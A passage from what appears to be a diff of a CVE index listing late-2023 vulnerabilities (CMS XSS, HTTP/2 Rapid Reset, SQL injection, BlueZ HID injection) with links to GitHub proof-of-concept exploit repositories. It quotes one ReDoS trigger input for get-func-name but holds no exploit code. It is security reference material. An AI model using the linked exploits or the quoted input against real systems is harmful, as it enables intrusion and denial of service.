Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the News Menu component. + + +- [sromanhu/CVE-2023-43358-CMSmadesimple-Stored-XSS---News](https://github.com/sromanhu/CVE-2023-43358-CMSmadesimple-Stored-XSS---News) + +### CVE-2023-43359 (2023-10-19) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Page Specific Metadata and Smarty data parameters in the Content Manager Menu component. + + +- [sromanhu/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager](https://github.com/sromanhu/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager) + +### CVE-2023-43360 (2023-10-24) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Top Directory parameter in the File Picker Menu component. + + +- [sromanhu/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension](https://github.com/sromanhu/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension) + +### CVE-2023-43364 (2023-12-12) + +main.py in Searchor before 2.4.2 uses eval on CLI input, which may cause unexpected code execution. + + +- [libertycityhacker/CVE-2023-43364-Exploit-CVE](https://github.com/libertycityhacker/CVE-2023-43364-Exploit-CVE) + +### CVE-2023-43481 (2023-12-27) + +An issue in Shenzhen TCL Browser TV Web BrowseHere (aka com.tcl.browser) 6.65.022_dab24cc6_231221_gp allows a remote attacker to execute arbitrary JavaScript code via the com.tcl.browser.portal.browse.activity.BrowsePageActivity component. + + +- [actuator/com.tcl.browser](https://github.com/actuator/com.tcl.browser) + +### CVE-2023-43482 (2024-02-06) + +A command execution vulnerability exists in the guest resource functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. + + +- [Mr-xn/CVE-2023-43482](https://github.com/Mr-xn/CVE-2023-43482) + +### CVE-2023-43494 (2023-09-20) + +Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered. + + +- [mqxmm/CVE-2023-43494](https://github.com/mqxmm/CVE-2023-43494) + +### CVE-2023-43622 (2023-10-23) + +An attacker, opening a HTTP/2 connection with an initial window size of 0, was able to block handling of that connection indefinitely in Apache HTTP Server. This could be used to exhaust worker resources in the server, similar to the well known "slow loris" attack pattern.\nThis has been fixed in version 2.4.58, so that such connection are terminated properly after the configured connection timeout.\n\nThis issue affects Apache HTTP Server: from 2.4.55 through 2.4.57.\n\nUsers are recommended to upgrade to version 2.4.58, which fixes the issue.\n\n + + +- [visudade/CVE-2023-43622](https://github.com/visudade/CVE-2023-43622) + +### CVE-2023-43646 (2023-09-26) + +get-func-name is a module to retrieve a function's name securely and consistently both in NodeJS and the browser. Versions prior to 2.0.1 are subject to a regular expression denial of service (redos) vulnerability which may lead to a denial of service when parsing malicious input. This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input: '\t'.repeat(54773) + '\t/function/i'. This issue has been addressed in commit `f934b228b` which has been included in releases from 2.0.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [200101WhoAmI/CVE-2023-43646](https://github.com/200101WhoAmI/CVE-2023-43646) + +### CVE-2023-43654 (2023-09-28) + +TorchServe is a tool for serving and scaling PyTorch models in production. TorchServe default configuration lacks proper input validation, enabling third parties to invoke remote HTTP download requests and write files to the disk. This issue could be taken advantage of to compromise the integrity of the system and sensitive data. This issue is present in versions 0.1.0 to 0.8.1. A user is able to load the model of their choice from any URL that they would like to use. The user of TorchServe is responsible for configuring both the allowed_urls and specifying the model URL to be used. A pull request to warn the user when the default value for allowed_urls is used has been merged in PR #2534. TorchServe release 0.8.2 includes this change. Users are advised to upgrade. There are no known workarounds for this issue. + + +- [OligoCyberSecurity/ShellTorchChecker](https://github.com/OligoCyberSecurity/ShellTorchChecker) +- [OligoCyberSecurity/CVE-2023-43654](https://github.com/OligoCyberSecurity/CVE-2023-43654) + +### CVE-2023-43667 (2023-10-16) + +Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.8.0, the attacker can create misleading or false log records, making it harder to audit\nand trace malicious activities. Users are advised to upgrade to Apache InLong's 1.9.0 or cherry-pick [1] to solve it.\n\n[1] https://github.com/apache/inlong/pull/8628 + + +- [miguelc49/CVE-2023-43667-2](https://github.com/miguelc49/CVE-2023-43667-2) +- [miguelc49/CVE-2023-43667-1](https://github.com/miguelc49/CVE-2023-43667-1) +- [miguelc49/CVE-2023-43667-3](https://github.com/miguelc49/CVE-2023-43667-3) + +### CVE-2023-43757 (2023-11-16) + +Inadequate encryption strength vulnerability in multiple routers provided by ELECOM CO.,LTD. and LOGITEC CORPORATION allows a network-adjacent unauthenticated attacker to guess the encryption key used for wireless LAN communication and intercept the communication. As for the affected products/versions, see the information provided by the vendor under [References] section. + + +- [sharmashreejaa/CVE-2023-43757](https://github.com/sharmashreejaa/CVE-2023-43757) + +### CVE-2023-43770 (2023-09-22) + +Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3 allows XSS via text/plain e-mail messages with crafted links because of program/lib/Roundcube/rcube_string_replacer.php behavior. + + +- [s3cb0y/CVE-2023-43770-POC](https://github.com/s3cb0y/CVE-2023-43770-POC) +- [knight0x07/CVE-2023-43770-PoC](https://github.com/knight0x07/CVE-2023-43770-PoC) + +### CVE-2023-43786 (2023-10-10) + +A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition. + + +- [jfrog/jfrog-CVE-2023-43786-libX11_DoS](https://github.com/jfrog/jfrog-CVE-2023-43786-libX11_DoS) + +### CVE-2023-43838 (2023-10-04) + +An arbitrary file upload vulnerability in Personal Management System v1.4.64 allows attackers to execute arbitrary code via uploading a crafted SVG file into a user profile's avatar. + + +- [rootd4ddy/CVE-2023-43838](https://github.com/rootd4ddy/CVE-2023-43838) + +### CVE-2023-43871 (2023-09-28) + +A File upload vulnerability in WBCE v.1.6.1 allows a local attacker to upload a pdf file with hidden Cross Site Scripting (XSS). + + +- [sromanhu/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media](https://github.com/sromanhu/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media) + +### CVE-2023-43872 (2023-09-28) + +A File upload vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to upload a pdf file with hidden Cross Site Scripting (XSS). + + +- [sromanhu/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager](https://github.com/sromanhu/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager) + +### CVE-2023-43873 (2023-09-28) + +A Cross Site Scripting (XSS) vulnerability in e017 CMS v.2.3.2 allows a local attacker to execute arbitrary code via a crafted script to the Name filed in the Manage Menu. + + +- [sromanhu/CVE-2023-43873-e107-CMS-Stored-XSS---Manage](https://github.com/sromanhu/CVE-2023-43873-e107-CMS-Stored-XSS---Manage) + +### CVE-2023-43874 (2023-09-28) + +Multiple Cross Site Scripting (XSS) vulnerability in e017 CMS v.2.3.2 allows a local attacker to execute arbitrary code via a crafted script to the Copyright and Author fields in the Meta & Custom Tags Menu. + + +- [sromanhu/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags](https://github.com/sromanhu/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags) + +### CVE-2023-43875 (2023-10-19) + +Multiple Cross-Site Scripting (XSS) vulnerabilities in installation of Subrion CMS v.4.2.1 allows a local attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost, dbname, dbuser, adminusername and adminemail. + + +- [sromanhu/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation) + +### CVE-2023-43876 (2023-09-28) + +A Cross-Site Scripting (XSS) vulnerability in installation of October v.3.4.16 allows an attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost field. + + +- [sromanhu/CVE-2023-43876-October-CMS-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43876-October-CMS-Reflected-XSS---Installation) + +### CVE-2023-43877 (2023-10-04) + +Rite CMS 3.0 has Multiple Cross-Site scripting (XSS) vulnerabilities that allow attackers to execute arbitrary code via a payload crafted in the Home Page fields in the Administration menu. + + +- [sromanhu/CVE-2023-43877-RiteCMS-Stored-XSS---Home](https://github.com/sromanhu/CVE-2023-43877-RiteCMS-Stored-XSS---Home) + +### CVE-2023-43878 (2023-09-28) + +Rite CMS 3.0 has Multiple Cross-Site scripting (XSS) vulnerabilities that allow attackers to execute arbitrary code via a crafted payload into the Main Menu Items in the Administration Menu. + + +- [sromanhu/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu](https://github.com/sromanhu/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu) + +### CVE-2023-43879 (2023-09-28) + +Rite CMS 3.0 has a Cross-Site scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload into the Global Content Blocks in the Administration Menu. + + +- [sromanhu/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent](https://github.com/sromanhu/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent) + +### CVE-2023-43955 (2023-12-27) + +The com.phlox.tvwebbrowser TV Bro application through 2.0.0 for Android mishandles external intents through WebView. This allows attackers to execute arbitrary code, create arbitrary files. and perform arbitrary downloads via JavaScript that uses takeBlobDownloadData. + + +- [actuator/com.phlox.tvwebbrowser](https://github.com/actuator/com.phlox.tvwebbrowser) + +### CVE-2023-44061 (2023-10-06) + +File Upload vulnerability in Simple and Nice Shopping Cart Script v.1.0 allows a remote attacker to execute arbitrary code via the upload function in the edit profile component. + + +- [SoundarXploit/CVE-2023-44061](https://github.com/SoundarXploit/CVE-2023-44061) + +### CVE-2023-44451 (2024-05-03) + +Linux Mint Xreader EPUB File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Mint Xreader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of EPUB files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-21897. + + +- [febinrev/slippy-book-exploit](https://github.com/febinrev/slippy-book-exploit) + +### CVE-2023-44452 (2024-05-03) + +Linux Mint Xreader CBT File Parsing Argument Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Mint Xreader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of CBT files. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22132. + + +- [febinrev/atril_cbt-inject-exploit](https://github.com/febinrev/atril_cbt-inject-exploit) + +### CVE-2023-44487 (2023-10-10) + +The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. + + +- [bcdannyboy/CVE-2023-44487](https://github.com/bcdannyboy/CVE-2023-44487) +- [imabee101/CVE-2023-44487](https://github.com/imabee101/CVE-2023-44487) +- [ByteHackr/CVE-2023-44487](https://github.com/ByteHackr/CVE-2023-44487) +- [pabloec20/rapidreset](https://github.com/pabloec20/rapidreset) +- [secengjeff/rapidresetclient](https://github.com/secengjeff/rapidresetclient) +- [studiogangster/CVE-2023-44487](https://github.com/studiogangster/CVE-2023-44487) +- [ReToCode/golang-CVE-2023-44487](https://github.com/ReToCode/golang-CVE-2023-44487) +- [ndrscodes/http2-rst-stream-attacker](https://github.com/ndrscodes/http2-rst-stream-attacker) +- [nxenon/cve-2023-44487](https://github.com/nxenon/cve-2023-44487) +- [terrorist/HTTP-2-Rapid-Reset-Client](https://github.com/terrorist/HTTP-2-Rapid-Reset-Client) +- [sigridou/CVE-2023-44487-](https://github.com/sigridou/CVE-2023-44487-) +- [TYuan0816/cve-2023-44487](https://github.com/TYuan0816/cve-2023-44487) +- [sn130hk/CVE-2023-44487](https://github.com/sn130hk/CVE-2023-44487) +- [threatlabindonesia/CVE-2023-44487-HTTP-2-Rapid-Reset-Exploit-PoC](https://github.com/threatlabindonesia/CVE-2023-44487-HTTP-2-Rapid-Reset-Exploit-PoC) + +### CVE-2023-44758 (2023-10-06) + +GDidees CMS 3.0 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Page Title. + + +- [sromanhu/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title](https://github.com/sromanhu/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title) + +### CVE-2023-44760 (2023-10-23) + +Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS v.9.2.1 allow an attacker to execute arbitrary code via a crafted script to the Header and Footer Tracking Codes of the SEO & Statistics. NOTE: the vendor disputes this because these header/footer changes can only be made by an admin, and allowing an admin to place JavaScript there is an intentional customization feature. Also, the exploitation method claimed by "sromanhu" does not provide any access to a Concrete CMS session, because the Concrete CMS session cookie is configured as HttpOnly. + + +- [sromanhu/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes](https://github.com/sromanhu/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes) + +### CVE-2023-44761 (2023-10-06) + +Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS versions affected to 8.5.13 and below, and 9.0.0 through 9.2.1 allow a local attacker to execute arbitrary code via a crafted script to the Forms of the Data objects. + + +- [sromanhu/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms](https://github.com/sromanhu/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms) + +### CVE-2023-44762 (2023-10-06) + +A Cross Site Scripting (XSS) vulnerability in Concrete CMS from versions 9.2.0 to 9.2.2 allows an attacker to execute arbitrary code via a crafted script to the Tags from Settings - Tags. + + +- [sromanhu/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags](https://github.com/sromanhu/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags) + +### CVE-2023-44763 (2023-10-10) + +Concrete CMS v9.2.1 is affected by an Arbitrary File Upload vulnerability via a Thumbnail file upload, which allows Cross-Site Scripting (XSS). NOTE: the vendor's position is that a customer is supposed to know that "pdf" should be excluded from the allowed file types, even though pdf is one of the allowed file types in the default configuration. + + +- [sromanhu/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail](https://github.com/sromanhu/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail) + +### CVE-2023-44764 (2023-10-06) + +A Cross Site Scripting (XSS) vulnerability in Concrete CMS before 9.2.3 exists via the Name parameter during installation (aka Site of Installation or Settings). + + +- [sromanhu/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation](https://github.com/sromanhu/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation) + +### CVE-2023-44765 (2023-10-06) + +A Cross Site Scripting (XSS) vulnerability in Concrete CMS versions 8.5.12 and below, and 9.0 through 9.2.1 allows an attacker to execute arbitrary code via a crafted script to Plural Handle of the Data Objects from System & Settings. + + +- [sromanhu/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations](https://github.com/sromanhu/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations) + +### CVE-2023-44766 (2023-10-06) + +A Cross Site Scripting (XSS) vulnerability in Concrete CMS v.9.2.1 allows an attacker to execute arbitrary code via a crafted script to the SEO - Extra from Page Settings. NOTE: the vendor disputes this because this SEO-related header change can only be made by an admin, and allowing an admin to place JavaScript there is an intentional customization feature. + + +- [sromanhu/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO](https://github.com/sromanhu/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO) + +### CVE-2023-44767 (2023-10-24) + +A File upload vulnerability in RiteCMS 3.0 allows a local attacker to upload a SVG file with XSS content. + + +- [sromanhu/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager](https://github.com/sromanhu/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager) + +### CVE-2023-44769 (2023-10-24) + +A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows a local attacker to execute arbitrary code via a crafted script to the Spare aliases from Alias. + + +- [sromanhu/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias](https://github.com/sromanhu/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias) + +### CVE-2023-44770 (2023-10-06) + +A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows an attacker to execute arbitrary code via a crafted script to the Organizer - Spare alias. + + +- [sromanhu/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias](https://github.com/sromanhu/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias) + +### CVE-2023-44771 (2023-10-06) + +A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows a local attacker to execute arbitrary code via a crafted script to the Page Layout. + + +- [sromanhu/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout](https://github.com/sromanhu/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout) + +### CVE-2023-44811 (2023-10-09) + +Cross Site Request Forgery (CSRF) vulnerability in MooSocial v.3.1.8 allows a remote attacker to execute arbitrary code and obtain sensitive information via the admin Password Change Function. + + +- [ahrixia/CVE-2023-44811](https://github.com/ahrixia/CVE-2023-44811) + +### CVE-2023-44812 (2023-10-09) + +Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the admin_redirect_url parameter of the user login function. + + +- [ahrixia/CVE-2023-44812](https://github.com/ahrixia/CVE-2023-44812) + +### CVE-2023-44813 (2023-10-09) + +Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function. + + +- [ahrixia/CVE-2023-44813](https://github.com/ahrixia/CVE-2023-44813) + +### CVE-2023-44961 (2023-10-11) + +SQL Injection vulnerability in Koha Library Software 23.0.5.04 and before allows a remote attacker to obtain sensitive information via the intranet/cgi bin/cataloging/ysearch.pl. component. + + +- [ggb0n/CVE-2023-44961](https://github.com/ggb0n/CVE-2023-44961) + +### CVE-2023-44962 (2023-10-11) + +File Upload vulnerability in Koha Library Software 23.05.04 and before allows a remote attacker to read arbitrary files via the upload-cover-image.pl component. + + +- [ggb0n/CVE-2023-44962](https://github.com/ggb0n/CVE-2023-44962) + +### CVE-2023-44976 +- [keowu/BadRentdrv2](https://github.com/keowu/BadRentdrv2) + +### CVE-2023-45158 (2023-10-16) + +An OS command injection vulnerability exists in web2py 2.24.1 and earlier. When the product is configured to use notifySendHandler for logging (not the default configuration), a crafted web request may execute an arbitrary OS command on the web server using the product. + + +- [Evan-Zhangyf/CVE-2023-45158](https://github.com/Evan-Zhangyf/CVE-2023-45158) + +### CVE-2023-45182 (2023-12-14) + +\nIBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 is vulnerable to having its key for an encrypted password decoded. By somehow gaining access to the encrypted password, a local attacker could exploit this vulnerability to obtain the password to other systems. IBM X-Force ID: 268265.\n\n + + +- [afine-com/CVE-2023-45182](https://github.com/afine-com/CVE-2023-45182) + +### CVE-2023-45184 (2023-12-14) + +IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to obtain a decryption key due to improper authority checks. IBM X-Force ID: 268270. + + +- [afine-com/CVE-2023-45184](https://github.com/afine-com/CVE-2023-45184) + +### CVE-2023-45185 (2023-12-14) + +IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to execute remote code. Due to improper authority checks the attacker could perform operations on the PC under the user's authority. IBM X-Force ID: 268273. + + +- [afine-com/CVE-2023-45185](https://github.com/afine-com/CVE-2023-45185) + +### CVE-2023-45239 (2023-10-06) + +A lack of input validation exists in tac_plus prior to commit 4fdf178 which, when pre or post auth commands are enabled, allows an attacker who can control the username, rem-addr, or NAC address sent to tac_plus to inject shell commands and gain remote code execution on the tac_plus server. + + +- [takeshixx/tac_plus-pre-auth-rce](https://github.com/takeshixx/tac_plus-pre-auth-rce) + +### CVE-2023-45280 (2023-10-19) + +Yamcs 5.8.6 allows XSS (issue 2 of 2). It comes with a Bucket as its primary storage mechanism. Buckets allow for the upload of any file. There's a way to upload an HTML file containing arbitrary JavaScript and then navigate to it. Once the user opens the file, the browser will execute the arbitrary JavaScript. + + +- [miguelc49/CVE-2023-45280-1](https://github.com/miguelc49/CVE-2023-45280-1) +- [miguelc49/CVE-2023-45280-3](https://github.com/miguelc49/CVE-2023-45280-3) +- [miguelc49/CVE-2023-45280-2](https://github.com/miguelc49/CVE-2023-45280-2) + +### CVE-2023-45288 (2024-04-04) + +An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection. + + +- [hex0punk/cont-flood-poc](https://github.com/hex0punk/cont-flood-poc) + +### CVE-2023-45471 (2023-10-20) + +The QAD Search Server is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to, and including, 1.0.0.315 due to insufficient checks on indexes. This makes it possible for unauthenticated attackers to create a new index and inject a malicious web script into its name, that will execute whenever a user accesses the search page. + + +- [mehdibelhajamor/CVE-2023-45471](https://github.com/mehdibelhajamor/CVE-2023-45471) + +### CVE-2023-45503 (2024-04-15) + +SQL Injection vulnerability in Macrob7 Macs CMS 1.1.4f, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via crafted payload to resetPassword, forgotPasswordProcess, saveUser, saveRole, deleteUser, deleteRole, deleteComment, deleteUser, allowComment, saveRole, forgotPasswordProcess, resetPassword, saveUser, addComment, saveRole, and saveUser endpoints. + + +- [ally-petitt/CVE-2023-45503](https://github.com/ally-petitt/CVE-2023-45503) + +### CVE-2023-45540 (2023-10-16) + +An issue in Jorani Leave Management System 1.0.3 allows a remote attacker to execute arbitrary HTML code via a crafted script to the comment field of the List of Leave requests page. + + +- [SoundarXploit/CVE-2023-45540](https://github.com/SoundarXploit/CVE-2023-45540) + +### CVE-2023-45542 (2023-10-16) + +Cross Site Scripting vulnerability in mooSocial 3.1.8 allows a remote attacker to obtain sensitive information via a crafted script to the q parameter in the Search function. + + +- [ahrixia/CVE-2023-45542](https://github.com/ahrixia/CVE-2023-45542) + +### CVE-2023-45657 (2023-11-06) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in POSIMYTH Nexter allows SQL Injection.This issue affects Nexter: from n/a through 2.0.3.\n\n + + +- [RandomRobbieBF/CVE-2023-45657](https://github.com/RandomRobbieBF/CVE-2023-45657) + +### CVE-2023-45777 (2023-12-04) + +In checkKeyIntentParceledCorrectly of AccountManagerService.java, there is a possible way to launch arbitrary activities using system privileges due to Parcel Mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [michalbednarski/TheLastBundleMismatch](https://github.com/michalbednarski/TheLastBundleMismatch) + +### CVE-2023-45779 (2023-12-04) + +In the APEX module framework of AOSP, there is a possible malicious update to platform components due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. More details on this can be found in the referenced links.\n + + +- [metaredteam/rtx-cve-2023-45779](https://github.com/metaredteam/rtx-cve-2023-45779) + +### CVE-2023-45819 (2023-10-19) + +TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s Notification Manager API. The vulnerability exploits TinyMCE's unfiltered notification system, which is used in error handling. The conditions for this exploit requires carefully crafted malicious content to have been inserted into the editor and a notification to have been triggered. When a notification was opened, the HTML within the text argument was displayed unfiltered in the notification. The vulnerability allowed arbitrary JavaScript execution when an notification presented in the TinyMCE UI for the current user. This issue could also be exploited by any integration which uses a TinyMCE notification to display unfiltered HTML content. This vulnerability has been patched in TinyMCE 5.10.8 and TinyMCE 6.7.1 by ensuring that the HTML displayed in the notification is sanitized, preventing the exploit. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n + + +- [philipsinnott/cve-2023-45819](https://github.com/philipsinnott/cve-2023-45819) + +### CVE-2023-45827 (2023-11-06) + +Dot diver is a lightweight, powerful, and dependency-free TypeScript utility library that provides types and functions to work with object paths in dot notation. In versions prior to 1.0.2 there is a Prototype Pollution vulnerability in the `setByPath` function which can leads to remote code execution (RCE). This issue has been addressed in commit `98daf567` which has been included in release 1.0.2. Users are advised to upgrade. There are no known workarounds to this vulnerability.\n + + +- [200101WhoAmI/CVE-2023-45827](https://github.com/200101WhoAmI/CVE-2023-45827) + +### CVE-2023-45828 (2025-01-02) + +Missing Authorization vulnerability in RumbleTalk Ltd RumbleTalk Live Group Chat allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RumbleTalk Live Group Chat: from n/a through 6.2.5. + + +- [RandomRobbieBF/CVE-2023-45828](https://github.com/RandomRobbieBF/CVE-2023-45828) + +### CVE-2023-45857 (2023-11-08) + +An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information. + + +- [valentin-panov/CVE-2023-45857](https://github.com/valentin-panov/CVE-2023-45857) +- [intercept6/CVE-2023-45857-Demo](https://github.com/intercept6/CVE-2023-45857-Demo) +- [fuyuooumi1027/CVE-2023-45857-Demo](https://github.com/fuyuooumi1027/CVE-2023-45857-Demo) + +### CVE-2023-45866 (2023-12-08) + +Bluetooth HID Hosts in BlueZ may permit an unauthenticated Peripheral role HID Device to initiate and establish an encrypted connection, and accept HID keyboard reports, potentially permitting injection of HID messages when no user interaction has occurred in the Central role to authorize such access. An example affected package is bluez 5.64-0ubuntu1 in Ubuntu 22.04LTS. NOTE: in some cases, a CVE-2020-0556 mitigation would have already addressed this Bluetooth HID Hosts issue. + + +- [pentestfunctions/BlueDucky](https://github.com/pentestfunctions/BlueDucky) +- [Eason-zz/BluetoothDucky](https://github.com/Eason-zz/BluetoothDucky) +- [jjjjjjjj987/cve-2023-45866-py](https://github.com/jjjjjjjj987/cve-2023-45866-py) +- [cisnarfu/Bluepop](https://github.com/cisnarfu/Bluepop) +- [AvishekDhakal/CVE-2023-45866_EXPLOITS](https://github.com/AvishekDhakal/CVE-2023-45866_EXPLOITS) +- [Chedrian07/CVE-2023-45866-POC](https://github.com/Chedrian07/CVE-2023-45866-POC) +- [Danyw24/blueXploit](https://github.com/Danyw24/blueXploit) +- [xG3nesis/RustyInjector](https://github.com/xG3nesis/RustyInjector) + +### CVE-2023-45966 (2023-10-23) + +umputun remark42 version 1.12.1 and before has a Blind Server-Side Request Forgery (SSRF) vulnerability. + + +- [jet-pentest/CVE-2023-45966](https://github.com/jet-pentest/CVE-2023-45966) + +### CVE-2023-45992 (2023-10-19) + +A vulnerability in the web-based interface of the RUCKUS Cloudpath product on version 5.12 build 5538 or before to could allow a remote, unauthenticated attacker to execute persistent XSS and CSRF attacks against a user of the admin management interface. A successful attack, combined with a certain admin activity, could allow the attacker to gain full admin privileges on the exploited system. + + +- [harry935/CVE-2023-45992](https://github.com/harry935/CVE-2023-45992) + +### CVE-2023-46003 (2023-10-21) + +I-doit pro 25 and below is vulnerable to Cross Site Scripting (XSS) via index.php. + + +- [leekenghwa/CVE-2023-46003](https://github.com/leekenghwa/CVE-2023-46003) + +### CVE-2023-46012 (2024-05-07) + +Buffer Overflow vulnerability LINKSYS EA7500 3.0.1.207964 allows a remote attacker to execute arbitrary code via an HTTP request to the IGD UPnP. + + +- [dest-3/CVE-2023-46012](https://github.com/dest-3/CVE-2023-46012) + +### CVE-2023-46014 (2023-11-13) + +SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'hemail' and 'hpassword' parameters. + + +- [ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) + +### CVE-2023-46015 (2023-11-13) + +Cross Site Scripting (XSS) vulnerability in index.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via 'msg' parameter in application URL. + + +- [ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability) + +### CVE-2023-46016 (2023-11-13) + +Cross Site Scripting (XSS) in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'search' parameter in the application URL. + + +- 